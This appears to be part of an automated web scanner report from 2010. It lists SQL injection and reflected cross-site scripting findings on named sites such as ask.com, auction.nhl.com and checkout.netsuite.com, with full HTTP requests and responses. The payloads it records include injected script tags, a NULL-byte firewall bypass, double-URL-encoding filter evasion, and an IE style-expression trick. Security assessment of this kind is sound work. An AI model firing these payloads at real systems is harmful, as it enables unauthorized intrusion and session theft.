text/javascript">JASK.cfg = (function() {return {"ldomain":"http://www.ask.com","_ldomain":"www.ask.com","secureDomain":"secure.ask.com","uid":"","poll":"false","username":"","avatarurl":"","queryid":"D0BCE2043484BBAADDA838DEC3453BAD","isQuestion":false,"protocol":"https","cleanusername":"","feedbackUrl":"http://feedback.ask.com","thinHeader":"false","fullFlex":"false","viewerIsOwner":"false","trackerImpressionUri":"http://www.ask.com/tracker/i/","trackerActivityUri":"http://www.ask.com/tracker/a/","trackerData":{"ld":"","qsrc":"119","o":"0","l":"dir"},"gigyaAPIKey":'2_kF3uRGWN0bDCn_y8GPWYEQPm_IzHqFvA4P0E2loB9eB0TfwsC2Zjd08EOqXYbqcu',"isAnswerExchangePartner":''};})();</script></head><body><div id="navbar" class="navbar fade"><div class="left shsp"><span class="selected txt3">Web</span><a id="nbImages" href="pictureslanding?o=0&l=dir" class="txt3" >Images</a><a id="nbNews" href="news?o=0&l=dir" class="txt3" >News</a><a id="nbVideos" href="videos?o=0&l=dir" class="txt3" >Videos</a><div class="mlinks"><a id="nbThemes" href="skins?o=0&l=dir" class="txt1" >Themes</a><a id="nbAdvancedSearch" href="webadvanced?o=0&l=dir" class="txt1" >Advanced Search</a><a id="nbSettings" href="settings?o=0&l=dir" class="txt1" >Settings</a><a id="nbSignIn" href="jsignin?o=0&l=dir" class="txt1" >Sign In</a></div></div><div class="cap shsp"></div></div><div id="md_qboxLayout" class="module qboxlayout"><div class="qbox sprite"><div class="input" name="searchBoxContainer"><form action="web"><input id="q" name="q" value="" class="query" value="" autocomplete="off" /><input id="sbut" type="submit" name="search" value="" class="sprite"><input id="qsrc" type="hidden" name="qsrc" value="0" /><input id="origin" type="hidden" name="o" value="0" /><input id="partner" type="hidden" name="l" value="dir" /></form></div><script type="text/javascript">document.getElementById('q').focus();</script></div><div class="peel fade"><a href="skins?o=0&l=dir"></a></div></div><div id="content" class="fade"><div id="content_cap" class="sprite"></div><div id="content_content" class="sprite"><div class="sections"><div id="md_cns1" class="qotd sprite"><div class="hda"><a href="http://www.ask.com/questionoftheday" cl
...[SNIP]...

Request 2

GET /jsignin25257047'%20or%201%3d2--%20?o=0&l=dir HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 16:59:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 16:59:41 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjU5OjQxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:41 GMT; Path=/
Set-Cookie: jss=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:41 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 16:59:41 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 77270

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de
...[SNIP]...
text/javascript">JASK.cfg = (function() {return {"ldomain":"http://www.ask.com","_ldomain":"www.ask.com","secureDomain":"secure.ask.com","uid":"","poll":"false","username":"","avatarurl":"","queryid":"E421B13EA871884DB455E4D924D28EB4","isQuestion":false,"protocol":"https","cleanusername":"","feedbackUrl":"http://feedback.ask.com","thinHeader":"false","fullFlex":"false","viewerIsOwner":"false","trackerImpressionUri":"http://www.ask.com/tracker/i/","trackerActivityUri":"http://www.ask.com/tracker/a/","trackerData":{"ld":"","qsrc":"119","o":"0","l":"dir"},"gigyaAPIKey":'2_kF3uRGWN0bDCn_y8GPWYEQPm_IzHqFvA4P0E2loB9eB0TfwsC2Zjd08EOqXYbqcu',"isAnswerExchangePartner":''};})();</script></head><body><div id="navbar" class="navbar fade"><div class="left shsp"><span class="selected txt3">Web</span><a id="nbImages" href="pictureslanding?o=0&l=dir" class="txt3" >Images</a><a id="nbNews" href="news?o=0&l=dir" class="txt3" >News</a><a id="nbVideos" href="videos?o=0&l=dir" class="txt3" >Videos</a><div class="mlinks"><a id="nbThemes" href="skins?o=0&l=dir" class="txt1" >Themes</a><a id="nbAdvancedSearch" href="webadvanced?o=0&l=dir" class="txt1" >Advanced Search</a><a id="nbSettings" href="settings?o=0&l=dir" class="txt1" >Settings</a><a id="nbSignIn" href="jsignin?o=0&l=dir" class="txt1" >Sign In</a></div></div><div class="cap shsp"></div></div><div id="md_qboxLayout" class="module qboxlayout"><div class="qbox sprite"><div class="input" name="searchBoxContainer"><form action="web"><input id="q" name="q" value="" class="query" value="" autocomplete="off" /><input id="sbut" type="submit" name="search" value="" class="sprite"><input id="qsrc" type="hidden" name="qsrc" value="0" /><input id="origin" type="hidden" name="o" value="0" /><input id="partner" type="hidden" name="l" value="dir" /></form></div><script type="text/javascript">document.getElementById('q').focus();</script></div><div class="peel fade"><a href="skins?o=0&l=dir"></a></div></div><div id="content" class="fade"><div id="content_cap" class="sprite"></div><div id="content_content" class="sprite"><div class="sections"><div id="md_cns1" class="qotd sprite"><div class="hda"><a href="http://www.ask.com/questionoftheday" cl
...[SNIP]...

1.2. http://www.ask.com/local [gc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ask.com
Path:   /local

Issue detail

The gc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the gc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /local?qsrc=3103 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00'; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:01:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:01:20 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAxOjIwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:20 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:20 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 194832


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0;URL=http://www.ask.com/loc
...[SNIP]...
<div class="txt3 abstract">

Diners who want to experience exceptional Indian cuisine take a short trip to Bombay Brasserie. Now, in addition to our existing West University location, we are pleased to announce the opening of our Galleria location, just off of 610 and
...[SNIP]...

Request 2

GET /local?qsrc=3103 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ldst=sorg=-1|1290271661055; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=%00''; tbe=1; qh=1-bG9zK2FuZ2VsZXMraXQrY29uc3VsdGluZw..; accepting=1; wz_scnt=1; gct=; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjQxLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5597|0~5488|0~5489|0~5490|0~5491|0~5397|0; qc=0; cu.wz=0; gcht=; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmc=252994457; user=o=0&l=dir; __utmb=252994457.2.10.1290271572;

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Sat, 20 Nov 2010 17:01:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Mon, 19-Nov-2012 17:01:28 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=U2F0LTIwLU5vdi0yMDEwLTE3OjAxOjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:28 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Sun, 20-Nov-2011 17:01:28 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 194829


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0;URL=http://www.ask.com/loc
...[SNIP]...

2. Cross-site scripting (reflected)  previous
There are 291 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.vulnerable.ad.partner/adj/Auctions/ros [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/Auctions/ros

Issue detail

The value of the kw request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2636'%3balert(1)//bbf2983398d was submitted in the kw parameter. This input was echoed as b2636';alert(1)//bbf2983398d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/Auctions/ros;kw=b2636'%3balert(1)//bbf2983398d HTTP/1.1
Accept: */*
Referer: http://network.nhl.com/auct_index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 409
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 20 Nov 2010 18:13:23 GMT
Expires: Sat, 20 Nov 2010 18:13:23 GMT

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/0/0/%2a/f;232303829;0-0;0;13225709;255-0/0;39214187/39231974/1;;~okv=;kw=b2636';alert(1)//bbf2983398d;~aopt=2/1/aa/0;~sscs=%3fhttp://shop.nhl.com/entry.point?target=z&source=NHL_BAN:FS$85NOV468x60Static:11.03.10">
...[SNIP]...

2.2. http://ad.vulnerable.ad.partner/adj/Auctions/ros [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/Auctions/ros

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2667'-alert(1)-'aad659deeb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/Auctions/ros;kw=auctions;sz=468x60;ord=1290275809723?&a2667'-alert(1)-'aad659deeb0=1 HTTP/1.1
Accept: */*
Referer: http://network.nhl.com/auct_index.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 20 Nov 2010 18:13:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 432

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a58/0/0/%2a/b;232303829;0-0;0;13225709;1-468/60;39214187/39231974/1;;~okv=;kw=auctions;sz=468x60;;a2667'-alert(1)-'aad659deeb0=1;~aopt=2/1/aa/0;~sscs=%3fhttp://shop.nhl.com/entry.point?target=z&source=NHL_BAN:FS$85NOV468x60Static:11.03.10">
...[SNIP]...

2.3. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29442"-alert(1)-"a82b9d9e55a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1299725&29442"-alert(1)-"a82b9d9e55a=1 HTTP/1.1
Accept: */*
Referer: http://209.197.9.121/v8u2m5i8/cds/i/i2.html?t=2-1005410&dopvhost=adserving.cpxadroit.com&doppl=f34985b9bfae7845bffe78456e3b71c8&dopsig=1df9c0848e5f514e60141317d7bee37f
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserving.cpxinteractive.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:50:15 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 20 Nov 2010 16:50:15 GMT
Pragma: no-cache
Content-Length: 4334
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://adserving.cpxinteractive.com/imp?29442"-alert(1)-"a82b9d9e55a=1&Z=300x250&s=1299725&_salt=1744088892";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new A
...[SNIP]...

2.4. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://auction.nhl.com
Path:   /cgi-bin/ncommerce3/User

Issue detail

The value of the id request parameter is copied into the HTML document as text between TITLE tags. The payload 5f651</title><script>alert(1)</script>0e9cb24f1cc was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ncommerce3/User?id=hfcNHL5f651</title><script>alert(1)</script>0e9cb24f1cc&wl=12717464&type=L HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200
Connection: close
Date: Sat, 20 Nov 2010 17:53:15 GMT
Server: Microsoft-IIS/6.0
Content-type: text/html
Set-cookie: TRUID=-1; path=/;
Set-cookie: SESSION_ID=-1,ceWj4vHmggM0P+5m0PkYbJ/Bg2JOsnfWuIEa/JRC856+RLBNS0fhxA==; path=/;


<!--


-->


<HTML>


<HEAD>
<TITLE>NHL Auctions Hockey Memorabilia - Listings for hfcNHL5f651</title><script>alert(1)</script>0e9cb24f1cc</TITLE>
...[SNIP]...

2.5. http://auction.nhl.com/cgi-bin/ncommerce3/User [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://auction.nhl.com
Path:   /cgi-bin/ncommerce3/User

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2a4"><script>alert(1)</script>a0866ed5e5f was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ncommerce3/User?id=hfcNHLbe2a4"><script>alert(1)</script>a0866ed5e5f&wl=12717464&type=L HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200
Connection: close
Date: Sat, 20 Nov 2010 17:53:13 GMT
Server: Microsoft-IIS/6.0
Content-type: text/html
Set-cookie: TRUID=-1; path=/;
Set-cookie: SESSION_ID=-1,ceWj4vHmggM0P+5m0PkYbJ/Bg2JOsnfWuIEa/JRC856+RLBNS0fhxA==; path=/;


<!--


-->


<HTML>


<HEAD>
<TITLE>NHL Auctions Hockey Me
...[SNIP]...
<input type="hidden" NAME="id" value="hfcNHLbe2a4"><script>alert(1)</script>a0866ed5e5f" >
...[SNIP]...

2.6. http://auction.nhl.com/cgi-bin/ncommerce3/User [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://auction.nhl.com
Path:   /cgi-bin/ncommerce3/User

Issue detail

The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcbb"><script>alert(1)</script>597da3a48aa was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/ncommerce3/User?id=hfcNHL&wl=12717464&type=L2dcbb"><script>alert(1)</script>597da3a48aa HTTP/1.1
Host: auction.nhl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200
Connection: close
Date: Sat, 20 Nov 2010 17:53:16 GMT
Server: Microsoft-IIS/6.0
Content-type: text/html
Set-cookie: TRUID=-1; path=/;
Set-cookie: SESSION_ID=-1,ceWj4vHmggM0P+5m0PkYbJ/Bg2JOsnfWuIEa/JRC856+RLBNS0fhxA==; path=/;


<!--


-->


<HTML>


<HEAD>
<TITLE>NHL Auctions Hockey Me
...[SNIP]...
<input type="hidden" NAME="type" value="L2dcbb"><script>alert(1)</script>597da3a48aa" >
...[SNIP]...

2.7. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e was submitted in the REST URL parameter 4. This input was echoed as d1205'style='x:expression(alert(1))'04ac6827f1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /app/center/nlvisitor.nl/c.1034828d1205'style%3d'x%3aexpression(alert(1))'04ac6827f1e/n.3/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:25:30 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -2036709634:616363742D6A6176613038352E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=966
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 47193


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title></title>


<meta name="robots" content="noindex,nofollow">
<script language='JavaScript' type='text/javascript
...[SNIP]...
<input type='hidden' name='referer' value='https://checkout.netsuite.com/app/center/nlvisitor.nl?c=1034828d1205'style='x:expression(alert(1))'04ac6827f1e&sc=6&n=3'>
...[SNIP]...

2.8. https://checkout.netsuite.com/app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://checkout.netsuite.com
Path:   /app/center/nlvisitor.nl/c.1034828/n.3/sc.6/.f

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ea1e0%2527a%253d%2527b%2527a4e19e91a04 was submitted in the REST URL parameter 5. This input was echoed as ea1e0'a='b'a4e19e91a04 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /app/center/nlvisitor.nl/c.1034828/n.3ea1e0%2527a%253d%2527b%2527a4e19e91a04/sc.6/.f HTTP/1.1
Host: checkout.netsuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=LycGMyBNRjjQpg2yQxfl568LH03v7PJ2JZhbrvfVJvqcPnWypyG9MDpC5CBHkTSjvQXJ7XfkxPhrQJbWLwsx4vv2QwMgnpHZ4bfg8R2qCtRQh3R6Q1mQQGCHQQcl4G9c!-548196153; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); StoreEmail=rt'@1.com; NLShopperId7=rnoX2qVXAQEJBIY6; NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1289251037.1290273104.3; __utmc=1; __utmb=1.2.10.1290273104; NLShopperId=rnoX2lhXAQEmkIji;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:25:32 GMT
Server: Apache
Cache-Control: No-Cache
Pragma: No-Cache
Expires: 0
